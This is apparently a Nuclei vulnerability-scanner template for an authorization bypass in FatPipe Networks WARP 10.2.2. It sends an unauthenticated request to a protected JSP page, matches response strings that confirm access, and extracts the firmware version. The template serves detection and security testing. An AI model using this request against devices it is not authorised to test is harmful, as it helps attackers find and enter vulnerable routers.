id: fatpipe-auth-bypass info: name: FatPipe Networks WARP 10.2.2 Authorization Bypass author: gy741 severity: high description: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php - https://www.fatpipeinc.com/support/advisories.php tags: fatpipe,auth-bypass,router requests: - raw: - | GET /fpui/jsp/index.jsp HTTP/1.1 Host: {{Hostname}} Accept: */* matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "productType" - "type:" - "version:" - "FatPipe Networks" condition: and extractors: - type: regex part: body regex: - 'version: "([0-9.a-z]+)"'